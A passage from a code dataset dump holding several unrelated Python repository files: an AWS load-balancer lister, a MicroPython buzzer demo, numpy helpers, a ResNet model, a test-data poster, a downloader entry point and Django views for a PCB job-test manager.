lb_type = lb['Type']\n lb_scheme = lb['Scheme']\n print(f\"Load Balancer Name: {lb_name}\")\n print(f\"Load Balancer ARN: {lb_arn}\")\n print(f\"DNS Name: {lb_dns}\")\n print(f\"Type: {lb_type}\")\n print(f\"Scheme: {lb_scheme}\")\n print()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"List Load Balancers\")\n parser.add_argument(\"--profile\", type=str, help=\"AWS profile name\")\n\n args = parser.parse_args()\n list_load_balancers(args.profile)\n\n","repo_name":"xniola/AWS-SDK","sub_path":"ReadOnly/LoadBalancer/show_lb.py","file_name":"show_lb.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28421132129","text":"'''\n实验名称:DAC-蜂鸣器\n版本:v1.0\n日期:2019.4\n作者:01Studio\n说明���通过USER按键让DAC输出不同频率的方波来驱动蜂鸣器。\n'''\n\n#导入相关模块\nfrom pyb import DAC,Switch\nfrom machine import Pin,I2C\nfrom ssd1306 import SSD1306_I2C\n\n#初始化相关模块\ni2c = I2C(sda=Pin(\"Y8\"), scl=Pin(\"Y6\"))\noled = SSD1306_I2C(128, 64, i2c, addr=0x3c)\n\nsw = Switch() #定义按键对象名字为sw\ndac = DAC(1) #定义DAC对象名字为dac,输出引脚为X5\n\n#定义4组频率值:1Hz、200Hz、1000Hz、5000Hz\nfreq=[1,200,1000,5000]\n\n# 定义8位精度下方波的值。0、255分别对应输出0V、3.3V。需要定义成字节数组。\nbuf = bytearray(2)\nbuf[0]=0\nbuf[1]=255\n\nkey_node = 0 #按键标志位\ni = 0 #用于选择频率数组\n\n##############################################\n# 按键和其回调函数\n##############################################\ndef key():\n global key_node\n key_node = 1\n\nsw.callback(key) #当按键被按下时,执行函数key()\n\n##############################################\n# OLED初始显示\n##############################################\noled.fill(0) # 清屏显示黑色背景\noled.text('01Studio', 0, 0) # 首行显示01Studio\noled.text('DAC-Beep', 0, 15) # 次行显示实验名称\noled.text('Pls Press USER', 0, 40) # 显示当前频率\noled.show()\n\nwhile True:\n\n if key_node==1: #按键被按下\n i = i+1\n if i == 4:\n i = 0\n key_node = 0 #清空按键标志位\n\n #DAC输出指定频率\n dac.write_timed(buf, freq[i]*len(buf), mode=DAC.CIRCULAR)\n\n #显示当前频率\n oled.fill(0) # 清屏显示黑色背景\n oled.text('01Studio', 0, 0) # 首行显示01Studio\n oled.text('DAC-Beep', 0, 15) # 次行显示实验名称\n oled.text(str(freq[i]) + 'Hz', 0, 40) # 显示当前频率\n oled.show()\n","repo_name":"01studio-lab/MicroPython_Examples","sub_path":"pyBoard v1.1(STM32F405)/1.基础实验/9.DAC/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"zh","doc_type":"code","stars":107,"dataset":"github-code","pt":"67"} +{"seq_id":"24992353293","text":"import numpy as np\n\ndef cutoff_data(cutoff_files):\n \n cutoff=np.empty(len(cutoff_files)) \n \n length = 3 \n \n for i in range(len(cutoff_files)):\n \n with open(cutoff_files[i]) as searchfile:\n \n for line in searchfile:\n \n left,sep,right = line.partition('cutoff=')\n \n if sep: # True iff 'cutoff=' in line\n \n cutoff[i]=right[:length]\n \n return cutoff\n\n\ndef entropy_data(data_files):\n \n time_data = np.loadtxt(data_files[0],usecols=[0],unpack=True)\n \n ent_data=np.zeros([(len(data_files)-1),len(time_data)]) \n \n for i in (range(len(data_files)-1)):\n \n ent_data[i,]= np.loadtxt(data_files[i+1],usecols=[0],unpack=True)\n \n return (time_data, ent_data)\n\n \ndef expectation_data(data_files):\n \n time_data = np.loadtxt(data_files[0],usecols=[0],unpack=True)\n \n exp_data=np.zeros([len(data_files),len(time_data)]) \n\n \n for i in len(data_files):\n \n exp_data[i,]= np.loadtxt(data_files[i],usecols=[1],unpack=True)\n \n return (time_data, exp_data)\n\n \ndef overlap_data(data_files): \n \n time_data = np.loadtxt(data_files[0],usecols=[0],unpack=True)\n\n overlap_data=np.zeros([len(data_files),len(time_data)]) \n \n for i in len(data_files):\n \n overlap_data[i,]= np.loadtxt(data_files[i],usecols=[3],unpack=True)\n \n return (time_data, overlap_data)\n","repo_name":"AndrewHallam/convergence_test","sub_path":"convergence_test/data_extract.py","file_name":"data_extract.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4583312529","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass BasicBlock(nn.Module):\n\texpansion=1\n\tdef __init__(self,in_channel,out_channel,stride=1):\n\t\tsuper().__init__()\n\t\tself.conv1=nn.Conv2d(in_channel,out_channel,kernel_size=3,stride=stride,padding=1,bias=False)\n\t\tself.bn1=nn.BatchNorm2d(out_channel)\n\t\tself.conv2=nn.Conv2d(out_channel,out_channel,kernel_size=3,padding=1,bias=False)\n\t\tself.bn2=nn.BatchNorm2d(out_channel)\n\t\tself.shortcut=nn.Sequential()\n\t\tif stride!=1 or in_channel !=out_channel*self.expansion:\n\t\t\tself.shortcut=nn.Sequential(\n\t\t\t\tnn.Conv2d(in_channel,out_channel*self.expansion,kernel_size=1,stride=stride,bias=False),\n\t\t\t\tnn.BatchNorm2d(out_channel*self.expansion)\n\t\t\t)\n\n\tdef forward(self,x):\n\t\tout=self.conv1(x)\n\t\tout=self.bn1(out)\n\t\tout=F.relu(out)\n\n\t\tout=self.conv2(out)\n\t\tout=self.bn2(out)\n\t\t\n\t\tout+=self.shortcut(x)\n\t\tout=F.relu(out)\n\t\t\n\t\treturn out\n\nclass Bottleneck(nn.Module):\n\texpansion=4\n\tdef __init__(self,in_channel,out_channel,stride=1):\n\t\tsuper().__init__()\n\t\tself.conv1=nn.Conv2d(in_channel,out_channel,kernel_size=1,bias=False)\n\t\tself.bn1=nn.BatchNorm2d(out_channel)\n\t\tself.conv2=nn.Conv2d(out_channel,out_channel,kernel_size=3,stride=stride,padding=1,bias=False)\n\t\tself.bn2=nn.BatchNorm2d(out_channel)\n\t\tself.conv3=nn.Conv2d(out_channel,out_channel*self.expansion,kernel_size=1,bias=False)\n\t\tself.bn3=nn.BatchNorm2d(out_channel*self.expansion)\n\t\tself.shortcut=nn.Sequential()\n\t\tif stride!=1 or in_channel !=out_channel*self.expansion:\n\t\t\tself.shortcut=nn.Sequential(\n\t\t\t\tnn.Conv2d(in_channel,out_channel*self.expansion,kernel_size=1,stride=stride,bias=False),\n\t\t\t\tnn.BatchNorm2d(out_channel*self.expansion)\n\t\t\t)\n\n\tdef forward(self,x):\n\t\tout=self.conv1(x)\n\t\tout=self.bn1(out)\n\t\tout=F.relu(out)\n\n\t\tout=self.conv2(out)\n\t\tout=self.bn2(out)\n\t\tout=F.relu(out)\n\n\t\tout=self.conv3(out)\n\t\tout=self.bn3(out)\n\t\t\n\t\tout+=self.shortcut(x)\n\t\tout=F.relu(out)\n\t\t\n\t\treturn out\n\nclass ResNet(nn.Module):\n\tdef __init__(self,block,num_blocks,num_classes=10):\n\t\tsuper().__init__()\n\t\tself.cur_channel=64\n\t\tself.conv1=nn.Conv2d(3,self.cur_channel,kernel_size=3,stride=1,padding=1,bias=False)\n\t\tself.bn1=nn.BatchNorm2d(self.cur_channel)\n\t\tself.layer1=self._make_layer(block,64,1,num_blocks[0])\n\t\tself.layer2=self._make_layer(block,128,2,num_blocks[1])\n\t\tself.layer3=self._make_layer(block,256,2,num_blocks[2])\n\t\tself.layer4=self._make_layer(block,512,2,num_blocks[3])\n\t\tself.linear=nn.Linear(self.cur_channel,num_classes)\n\t\n\tdef _make_layer(self,block,out_channel,stride,num_blocks):\n\t\tstrides=[stride]+[1]*(num_blocks-1)\n\t\tlayers=[]\n\t\tfor s in strides:\n\t\t\tlayers.append(block(self.cur_channel,out_channel,stride=s))\n\t\t\tself.cur_channel=out_channel*block.expansion\n\t\treturn nn.Sequential(*layers)\n\t\n\tdef forward(self,x):\n\t\tout=self.conv1(x)\n\t\tout=self.bn1(out)\n\t\tout=F.relu(out)\n\n\t\tout=self.layer1(out)\n\t\tout=self.layer2(out)\n\t\tout=self.layer3(out)\n\t\tout=self.layer4(out)\n\n\t\tout=F.avg_pool2d(out,kernel_size=4)\n\t\tout=torch.flatten(out,1)\n\t\tout=self.linear(out)\n\t\treturn out\n\ndef ResNet18():\n\treturn ResNet(BasicBlock,[2,2,2,2])\n\ndef ResNet50():\n\treturn ResNet(Bottleneck,[3,4,6,3])\n\ndef test():\n\tnet=ResNet50().cuda()\n\tx=torch.randn(32,3,32,32).cuda()\n\ty=net(x)\n\tprint(y.size())\n\n\n# test()","repo_name":"cppascalinux/mlp","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11543805889","text":"import requests\nimport random\n\nlat = 40.1106\nlon = -88.2073\nconversion = 1 / 55.2428\nradius = 4\n\nurl = 'http://barleynet.herokuapp.com'\n#url = 'http://localhost:3000'\n\nfor i in range(2):\n d = {\n 'latitude': lat + (random.random()*2-1)*radius*conversion,\n 'longitude': lon + (random.random()*2-1)*radius*conversion}\n r = requests.post(url + '/api/location', data=d)\n r = r.json()\n \n d2 = {\n 'location': r['_id'],\n 'field': '57ddd756e59ee060ec05a881',\n 'description': 'Autogenerated point',\n #'red_flags': True,\n 'yield': 100 + 100000 * random.random(),\n 'yield_rate': 0.65 + 0.35 * random.random()\n }\n\n r = requests.post(url + '/api/logs', data=d2);\n print(r)\n print(r.json())","repo_name":"glassbeardglobal/budlabs-2016-backend","sub_path":"datagen/genLogs.py","file_name":"genLogs.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"34496537405","text":"#!/usr/bin/env python2.7\n# coding: utf-8\nfrom __future__ import unicode_literals, print_function\nimport signal\nimport platform\nimport time\n\nfrom nhentai.cmdline import cmd_parser, banner\nfrom nhentai.parser import doujinshi_parser, search_parser, print_doujinshi, favorites_parser\nfrom nhentai.doujinshi import Doujinshi\nfrom nhentai.downloader import Downloader\nfrom nhentai.logger import logger\nfrom nhentai.constant import BASE_URL\nfrom nhentai.utils import generate_html, generate_cbz, generate_main_html, generate_pdf, check_cookie, signal_handler, DB\n\n\ndef main():\n banner()\n options = cmd_parser()\n logger.info('Using mirror: {0}'.format(BASE_URL))\n\n from nhentai.constant import PROXY\n # constant.PROXY will be changed after cmd_parser()\n if PROXY:\n logger.info('Using proxy: {0}'.format(PROXY))\n\n # check your cookie\n check_cookie()\n\n doujinshis = []\n doujinshi_ids = []\n doujinshi_list = []\n\n if options.favorites:\n if not options.is_download:\n logger.warning('You do not specify --download option')\n\n doujinshis = favorites_parser(options.page_range)\n\n elif options.keyword:\n from nhentai.constant import LANGUAGE\n if LANGUAGE:\n logger.info('Using deafult language: {0}'.format(LANGUAGE))\n options.keyword += ', language:{}'.format(LANGUAGE)\n doujinshis = search_parser(options.keyword, sorting=options.sorting, page=options.page)\n\n elif not doujinshi_ids:\n doujinshi_ids = options.id\n\n print_doujinshi(doujinshis)\n if options.is_download and doujinshis:\n doujinshi_ids = [i['id'] for i in doujinshis]\n\n if options.is_save_download_history:\n with DB() as db:\n data = set(db.get_all())\n\n doujinshi_ids = list(set(doujinshi_ids) - data)\n\n if doujinshi_ids:\n for i, id_ in enumerate(doujinshi_ids):\n if options.delay:\n time.sleep(options.delay)\n\n doujinshi_info = doujinshi_parser(id_)\n\n if doujinshi_info:\n doujinshi_list.append(Doujinshi(name_format=options.name_format, **doujinshi_info))\n\n if (i + 1) % 10 == 0:\n logger.info('Progress: %d / %d' % (i + 1, len(doujinshi_ids)))\n\n if not options.is_show:\n downloader = Downloader(path=options.output_dir, size=options.threads,\n timeout=options.timeout, delay=options.delay)\n\n for doujinshi in doujinshi_list:\n\n doujinshi.downloader = downloader\n doujinshi.download()\n if options.is_save_download_history:\n with DB() as db:\n db.add_one(doujinshi.id)\n\n if not options.is_nohtml and not options.is_cbz and not options.is_pdf:\n generate_html(options.output_dir, doujinshi)\n elif options.is_cbz:\n generate_cbz(options.output_dir, doujinshi, options.rm_origin_dir)\n elif options.is_pdf:\n generate_pdf(options.output_dir, doujinshi, options.rm_origin_dir)\n\n if options.main_viewer:\n generate_main_html(options.output_dir)\n\n if not platform.system() == 'Windows':\n logger.log(15, '🍻 All done.')\n else:\n logger.log(15, 'All done.')\n\n else:\n [doujinshi.show() for doujinshi in doujinshi_list]\n\n\nsignal.signal(signal.SIGINT, signal_handler)\n\nif __name__ == '__main__':\n main()\n","repo_name":"MudkipofDespair/Codes","sub_path":"command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23982368510","text":"import json\nimport os\nimport shutil\nimport time\nimport rarfile\nfrom django.conf import settings\nfrom django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_protect\nfrom .models import EpcamModule\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\nfrom django.views.generic import ListView, DetailView, UpdateView, CreateView, DeleteView\nfrom .forms import JobForTestFormsReadOnly,JobForTestForm\nfrom .models import JobForTest,MyTagForEptest,Layer,Vs\nfrom account.models import QueryData, Customer\nfrom job.models import Job\nfrom cc.cc_method import CCMethod\n\n\n\n\ndef show_genres(request):\n return render(request, \"EpcamModule.html\", {'epcam_module': EpcamModule.objects.all()})\n\n\nclass JobForTestListView(ListView):\n queryset = JobForTest.objects.all()\n context_object_name = 'jobfortest'\n paginate_by = 5\n template_name = 'JobForTestListView.html'\n\n def get_context_data(self, **kwargs): # 重写get_context_data方法\n # 很关键,必须把原方法的结果拿到\n context = super().get_context_data(**kwargs)\n context['job_field_verbose_name'] = [JobForTest._meta.get_field('id').verbose_name,\n JobForTest._meta.get_field('job_parent').verbose_name,\n JobForTest._meta.get_field('job_name').verbose_name,\n JobForTest._meta.get_field('file').verbose_name,\n JobForTest._meta.get_field('file_type').verbose_name,\n JobForTest._meta.get_field('test_usage_for_epcam_module').verbose_name,\n JobForTest._meta.get_field('standard_odb').verbose_name,\n JobForTest._meta.get_field('vs_result_ep').verbose_name,\n JobForTest._meta.get_field('vs_result_g').verbose_name,\n JobForTest._meta.get_field('bug_info').verbose_name,\n JobForTest._meta.get_field('bool_layer_info').verbose_name,\n # JobForTest._meta.get_field('vs_time_ep').verbose_name,\n # JobForTest._meta.get_field('vs_time_g').verbose_name,\n JobForTest._meta.get_field('status').verbose_name,\n JobForTest._meta.get_field('updated').verbose_name,\n JobForTest._meta.get_field('author').verbose_name,\n JobForTest._meta.get_field('remark').verbose_name,\n \"标签\",\n \"操作\",\n ]\n\n\n\n # 使用分类筛选\n context['select_file_usage_type'] = [('all', '所有'), ('input_test', '导入测试'), ('customer_job', '客户资料'),\n ('test', '测试'), ('else', '其它')]\n context['select_author'] = [('all', '所有'), ('mine', '我的'), ]\n context['select_eptest_job_for_test_file_type'] = [ ('all', '所有'),('gerber274x', 'Gerber274X'), ('dxf', 'DXF'),('dwg', 'DWG'), ('odb', 'ODB'),\n ('pcb', 'PCB'), ('none', 'none'), ]\n context['select_status'] = [('all', '所有'), ('draft', '草稿'), ('published', '正式'), ]\n context['select_eptest_job_for_test_vs_result_g'] = [('all', '所有'), ('passed', '成功'), ('failed', '失败'), ('none', '未比对'), ]\n context['select_page'] = [('5', '5'), ('10', '10'), ('20', '20'), ('50', '50'), ('100', '100'),\n ('200', '200'), ]\n\n # print(\"len of objects-no filter:\", len(context['jobfortest']))\n\n\n # 加载当前用户的筛选条件\n try:\n current_query_data = QueryData.objects.get(author=self.request.user)\n # print(current_query_data)\n except:\n print(\"此用户无QueryData信息,此时要新建一下\")\n new_query_data = QueryData(author=self.request.user)\n new_query_data.save()\n current_query_data = QueryData.objects.get(author=self.request.user)\n print(\"current_query_data:\",current_query_data)\n\n\n #<------------------------------开始:默认根据历史值筛选---------------------------------------------------------->\n # 料号名称筛选\n context['query_job_job_name'] = current_query_data.query_job_job_name\n if context['query_job_job_name'] == None:\n context['query_job_job_name'] = \"\"\n current_query_data.query_job_job_name=\"\"\n current_query_data.save()\n context['jobfortest']= JobForTest.objects.filter(job_name__contains = context['query_job_job_name'])\n print(\"len of objects-filter by job:\", len(context['jobfortest']))\n\n # 料号负责人筛选\n if current_query_data.query_job_author == None:\n context['query_job_author'] = ''\n else:\n context['query_job_author'] = current_query_data.query_job_author\n print(\"context['query_job_author']:\",context['query_job_author'])\n context['jobfortest'] = context['jobfortest'].filter(author__username__contains=context['query_job_author'])\n # print(\"len of objects1:\", len(context['jobfortest']))\n\n # 模块名称筛选\n if current_query_data.query_eptest_job_for_test_test_usage_for_epcam_module == None:\n context['query_eptest_job_for_test_test_usage_for_epcam_module'] = ''\n else:\n context['query_eptest_job_for_test_test_usage_for_epcam_module'] = current_query_data.query_eptest_job_for_test_test_usage_for_epcam_module\n context['jobfortest'] = context['jobfortest'].filter(test_usage_for_epcam_module__name__contains=context['query_eptest_job_for_test_test_usage_for_epcam_module'])\n\n # 文件类型\n context['query_eptest_job_for_test_file_type'] = current_query_data.query_eptest_job_for_test_file_type\n if context['query_eptest_job_for_test_file_type'] == 'all':\n pass\n else:\n context['jobfortest'] = context['jobfortest'].filter(file_type=context['query_eptest_job_for_test_file_type'])\n\n\n\n # 料号状态\n context['query_job_status'] = current_query_data.query_job_status\n # print(\"query_job_file_usage_type:\",context['query_job_file_usage_type'])\n if context['query_job_status'] == 'all':\n pass\n if context['query_job_status'] == 'draft':\n context['jobfortest'] = context['jobfortest'].filter(status=\"draft\")\n if context['query_job_status'] == 'published':\n context['jobfortest'] = context['jobfortest'].filter(status=\"published\")\n\n # G软件比图结果\n context['query_eptest_job_for_test_vs_result_g'] = current_query_data.query_eptest_job_for_test_vs_result_g\n if context['query_eptest_job_for_test_vs_result_g'] == 'all':\n pass\n if context['query_eptest_job_for_test_vs_result_g'] != \"all\":\n context['jobfortest'] = context['jobfortest'].filter(\n vs_result_g__contains=context['query_eptest_job_for_test_vs_result_g'])\n\n\n\n\n\n # 每页显示行数\n context['query_job_paginator_page'] = current_query_data.query_job_paginator_page\n\n # <------------------------------结束:默认根据历史值筛选---------------------------------------------------------->\n\n\n # <-----------------------------------开始:get方法筛选---------------------------------------------------------->\n # get方式query数据\n submit_query_get = self.request.GET.get('submit_query_get', False)\n if submit_query_get:\n # 料号名称筛选\n query_job_name = self.request.GET.get('query_job_name', False)\n context['query_job_job_name'] = query_job_name\n # 先把本次筛选条件存储起来\n if query_job_name != None:\n current_query_data.query_job_job_name = query_job_name\n current_query_data.save()\n context['jobfortest'] = JobForTest.objects.filter(job_name__contains=context['query_job_job_name'])\n\n # 料号负责人筛选\n query_job_author = self.request.GET.get('query_job_author', False)\n context['query_job_author'] = query_job_author\n # 先把本次筛选条件存储起来\n if query_job_author != None:\n current_query_data.query_job_author = query_job_author\n current_query_data.save()\n context['jobfortest'] = context['jobfortest'].filter(author__username__contains = query_job_author)\n\n # 模块名称筛选\n query_eptest_job_for_test_test_usage_for_epcam_module = self.request.GET.get('query_eptest_job_for_test_test_usage_for_epcam_module', False)\n context['query_eptest_job_for_test_test_usage_for_epcam_module'] = query_eptest_job_for_test_test_usage_for_epcam_module\n # 先把本次筛选条件存储起来\n if query_eptest_job_for_test_test_usage_for_epcam_module != None:\n current_query_data.query_eptest_job_for_test_test_usage_for_epcam_module = query_eptest_job_for_test_test_usage_for_epcam_module\n current_query_data.save()\n context['jobfortest'] = context['jobfortest'].filter(test_usage_for_epcam_module__name__contains=query_eptest_job_for_test_test_usage_for_epcam_module)\n\n # 文件类型筛选\n query_eptest_job_for_test_file_type = self.request.GET.get(\"query_eptest_job_for_test_file_type\", False)\n context['query_eptest_job_for_test_file_type'] = query_eptest_job_for_test_file_type\n # 先把本次筛选条件存储起来\n current_query_data = QueryData.objects.get(author=self.request.user)\n if query_eptest_job_for_test_file_type:\n current_query_data.query_eptest_job_for_test_file_type = query_eptest_job_for_test_file_type\n current_query_data.save()\n if context['query_eptest_job_for_test_file_type'] == 'all':\n pass\n else:\n context['jobfortest'] = context['jobfortest'].filter(file_type=context['query_eptest_job_for_test_file_type'])\n\n\n\n\n # 料号状态筛选\n query_job_status = self.request.GET.get(\"query_job_status\", False)\n context['query_job_status'] = query_job_status\n # 先把本次筛选条件存储起来\n current_query_data = QueryData.objects.get(author=self.request.user)\n if query_job_status:\n current_query_data.query_job_status = query_job_status\n current_query_data.save()\n if context['query_job_status'] == 'all':\n pass\n if context['query_job_status'] == 'draft':\n context['jobfortest'] = context['jobfortest'].filter(status=\"draft\")\n if context['query_job_status'] == 'published':\n context['jobfortest'] = context['jobfortest'].filter(status=\"published\")\n\n # G软件比图结果\n query_eptest_job_for_test_vs_result_g = self.request.GET.get(\"query_eptest_job_for_test_vs_result_g\", False)\n context['query_eptest_job_for_test_vs_result_g'] = query_eptest_job_for_test_vs_result_g\n # 先把本次筛选条件存储起来\n current_query_data = QueryData.objects.get(author=self.request.user)\n if query_eptest_job_for_test_vs_result_g:\n current_query_data.query_eptest_job_for_test_vs_result_g = query_eptest_job_for_test_vs_result_g\n current_query_data.save()\n\n if context['query_eptest_job_for_test_vs_result_g'] == 'all':\n pass\n if context['query_eptest_job_for_test_vs_result_g'] != \"all\":\n context['jobfortest'] = context['jobfortest'].filter(\n vs_result_g__contains=context['query_eptest_job_for_test_vs_result_g'])\n\n\n #每页显示行数\n query_job_paginator_page = self.request.GET.get('query_job_paginator_page', False)\n context['query_job_paginator_page'] = query_job_paginator_page\n # 把每页显示多少行存储起来\n if query_job_paginator_page != None:\n current_query_data.query_job_paginator_page = query_job_paginator_page\n current_query_data.save()\n # <-----------------------------------结束:get方法筛选---------------------------------------------------------->\n\n\n # <--------------------------------------开始:tag筛选---------------------------------------------------------->\n tag_slug = self.kwargs.get('tag_slug', None)\n if tag_slug:\n print(\"tag_slug:\", tag_slug)\n # 从MyTag对应的数据库表里查询tag\n tag = get_object_or_404(MyTagForEptest, slug=tag_slug)\n context['jobfortest'] = context['jobfortest'].filter(tags__in=[tag])\n # <--------------------------------------结束:tag筛选---------------------------------------------------------->\n\n\n # <--------------------------------------开始:根据料号ID精准搜索-------------------------------------------------->\n search_by_job_id = self.request.GET.get('search_by_job_id', False)\n if search_by_job_id:\n print(\"search_by_job_id:\", search_by_job_id)\n context['jobfortest'] = JobForTest.objects.filter(Q(id=search_by_job_id))\n # <--------------------------------------结束:根据料号ID精准搜索-------------------------------------------------->\n\n\n\n # 料号很多时,要多页显示,但是在修改非首页内容时,比如修改某个料号,这个料号在第3页,如果不记住页数,修改完成后只能重定向到固定页。\n # 为了能记住当前页,用了下面的方法。\n if self.request.GET.__contains__(\"page\"):\n current_page = self.request.GET[\"page\"]\n print(\"current_page\", current_page)\n context['current_page'] = current_page\n else:\n context['current_page'] = 1\n\n\n\n print(\"len of objects:\",len(context['jobfortest']))\n\n # <-----------------------------------------------开始:分页----------------------------------------------------->\n page = self.request.GET.get('page')\n paginator = Paginator(context['jobfortest'], context['query_job_paginator_page']) # 每页显示3篇文章\n print(\"page:::\", page)\n try:\n context['jobs_page'] = paginator.page(page)\n except PageNotAnInteger:\n # 如果page参数不是一个整数就返回第一页\n context['jobs_page'] = paginator.page(1)\n except EmptyPage:\n # 如果页数超出总页数就返回最后一页\n context['jobs_page'] = paginator.page(paginator.num_pages)\n pagination_data = self.get_pagination_data(paginator, context['jobs_page'])\n context.update(pagination_data)\n # <-----------------------------------------------结束:分页----------------------------------------------------->\n\n\n return context\n\n def get_pagination_data(self, paginator, page_obj, around_count=2):\n left_has_more = False\n\n right_has_more = False\n current_page = page_obj.number\n if current_page <= around_count + 2:\n left_range = range(1, current_page)\n else:\n left_has_more = True\n left_range = range(current_page - around_count, current_page)\n\n if current_page >= paginator.num_pages - around_count - 1:\n right_range = range(current_page + 1, paginator.num_pages + 1)\n else:\n right_has_more = True\n right_range = range(current_page + 1, current_page + around_count + 1)\n\n pagination_data = {\n 'left_has_more': left_has_more,\n 'right_has_more': right_has_more,\n 'left_range': left_range,\n 'right_range': right_range\n }\n return pagination_data\n\n\n def post(self, request): # ***** this method required! ******\n self.object_list = self.get_queryset()\n if request.method == 'POST':\n print(\"POST!!!\")\n\n #分页跳转用\n if request.POST.__contains__(\"page_jump\"):\n print(request.POST.get(\"page_jump\"))\n return HttpResponse(request.POST.get(\"page_jump\"))\n\n\nclass JobForTestDetailViewForm(DetailView):\n model = JobForTest\n template_name = \"JobForTestDetailViewForm.html\"\n context_object_name = \"job_for_test\"\n pk_url_kwarg = \"pk\" # pk_url_kwarg默认值就是pk,这里可以覆盖,但必须和url中的命名组参数名称一致\n\n\n def get_form(self):\n self.pk = self.kwargs['pk']\n # print(\"pk:\",pk)\n job = JobForTest.objects.filter(id=self.pk).first()\n return JobForTestFormsReadOnly(instance=job)\n\n def get_context_data(self,*args, **kwargs):\n context = super().get_context_data(**kwargs)\n context['now'] = timezone.now()\n context['form'] = self.get_form()\n context['job_id'] = self.pk\n return context\n\n\nclass JobForTestUpdateView(UpdateView):\n \"\"\"\n 该类必须要有一个pk或者slug来查询(会调用self.object = self.get_object())\n \"\"\"\n model = JobForTest\n fields = \"__all__\"\n template_name = 'JobForTestUpdateView.html'\n\n def get(self, request, *args, **kwargs):\n\n job_update = JobForTest.objects.get(id=self.kwargs['pk'])\n form=JobForTestForm(instance=job_update)\n self.job_id = job_update.id\n print(\"ccabc:\", len(Job.objects.filter(id=job_update.job_parent_id)))\n if len(Job.objects.filter(id=job_update.job_parent_id)):\n self.job_parent_id = Job.objects.filter(id = job_update.job_parent_id)[0].id\n self.job_parent = job_update.job_parent\n else:\n self.job_parent_id = None\n self.job_parent = None\n\n current_page = self.kwargs['current_page']\n print(\"current_page\",current_page)\n return render(request, 'JobForTestUpdateView.html', {'form':form,'job_parent_id':self.job_parent_id,'job_parent':self.job_parent})\n\n def get_success_url(self):\n return '../../JobForTestListView?page={}'.format(self.kwargs['current_page'])\n\n\nclass JobForTestCreateView(CreateView):\n model=JobForTest\n template_name = \"JobForTestCreateView.html\"\n fields = \"__all__\"\n #设置新增料号时,自动填写上当前用户\n def get_initial(self):\n # Get the initial dictionary from the superclass method\n initial = super(JobForTestCreateView, self).get_initial()\n # Copy the dictionary so we don't accidentally change a mutable dict\n initial = initial.copy()\n initial['author'] = self.request.user\n return initial\n success_url = 'JobForTestListView'\n\n\n\n def get_context_data(self, **kwargs):\n context = super(JobForTestCreateView, self).get_context_data(**kwargs)\n if self.request.method == 'POST':\n pass\n\n else:\n pass\n\n #暂时用不着下面的方法\n # context['get_customer_pcb_factory']=self.get_customer_pcb_factory()\n # context['get_customer_pcb_design'] = self.get_customer_pcb_design()\n\n return context\n\n\nclass JobForTestDeleteView(DeleteView):\n \"\"\"\n \"\"\"\n model = JobForTest\n template_name = 'JobForTestDeleteView.html'\n success_url = reverse_lazy('eptest:JobForTestListView')\n\n\n\n\ndef get_layer_name_from_org(request,job_id):\n print(job_id)\n # 找到job对象\n job = JobForTest.objects.get(id=job_id)\n #先删除原来已有的层信息\n layer_old=Layer.objects.filter(job=job)\n print(layer_old)\n layer_old.delete()\n\n\n print(job.job_name, job.file)\n\n # 先拿到原始料号,放到临时文件夹,完成解压\n temp_path = r'C:\\cc\\share\\temp'+\"_\"+str(request.user)+\"_\"+str(job_id)\n if not os.path.exists(temp_path):\n os.mkdir(temp_path)\n\n org_file_path = (os.path.join(settings.BASE_DIR, r'media', str(job.file))).replace(r'/', '\\\\')\n shutil.copy(org_file_path, temp_path)\n time.sleep(0.2)\n rf = rarfile.RarFile(os.path.join(temp_path, str(job.file).split(\"/\")[1]))\n rf.extractall(temp_path)\n temp_compressed = os.path.join(temp_path, str(job.file).split(\"/\")[1])\n if os.path.exists(temp_compressed):\n os.remove(temp_compressed)\n file_path_gerber = os.listdir(temp_path)[0]\n print(file_path_gerber)\n\n\n\n list = os.listdir(os.path.join(temp_path,file_path_gerber)) # 列出文件夹下所有的目录与文件\n index=1\n for i in range(0, len(list)):\n path = os.path.join(os.path.join(temp_path,file_path_gerber), list[i])\n if os.path.isfile(path):\n pass\n print(path)\n file_name=list[i]\n file_name_org=list[i]\n if CCMethod.is_chinese(path):\n pass\n os.rename(path,os.path.join(temp_path,file_path_gerber,'unknow' + str(index)))\n file_name='unknow' + str(index)\n index=index+1\n file_name=file_name.replace(' ','-')\n file_name = file_name.replace('(', '-')\n file_name = file_name.replace(')', '-')\n layer_new = Layer()\n layer_new.job=job\n layer_new.layer=file_name\n layer_new.layer_org=file_name_org\n layer_new.save()\n # 删除temp_path\n if os.path.exists(temp_path):\n shutil.rmtree(temp_path)\n\n job.bool_layer_info='true'\n job.save()\n # return redirect('job_manage:JobListViewVs')\n # return redirect('../../../../../admin/#/admin/eptest/jobfortest/')\n # return HttpResponse(\"已完成!请F5刷新页面!\")\n return render(request,r'get_layer_info.html')\n\n\n\n@csrf_exempt\ndef send_vs_g_local_result(request):\n if request.method == 'POST':\n print(\"post\")\n # print(request.body)\n print(request.POST)\n body=json.loads(request.body)\n print(body,type(body))\n body_dict=json.loads(body)\n print(body_dict,type(body_dict))\n job_id = body_dict[\"job_id\"]\n job = JobForTest.objects.get(id=job_id)\n print(job)\n vs_time_g=body_dict[\"vs_time_g\"]\n g_vs_total_result_flag=True\n\n if 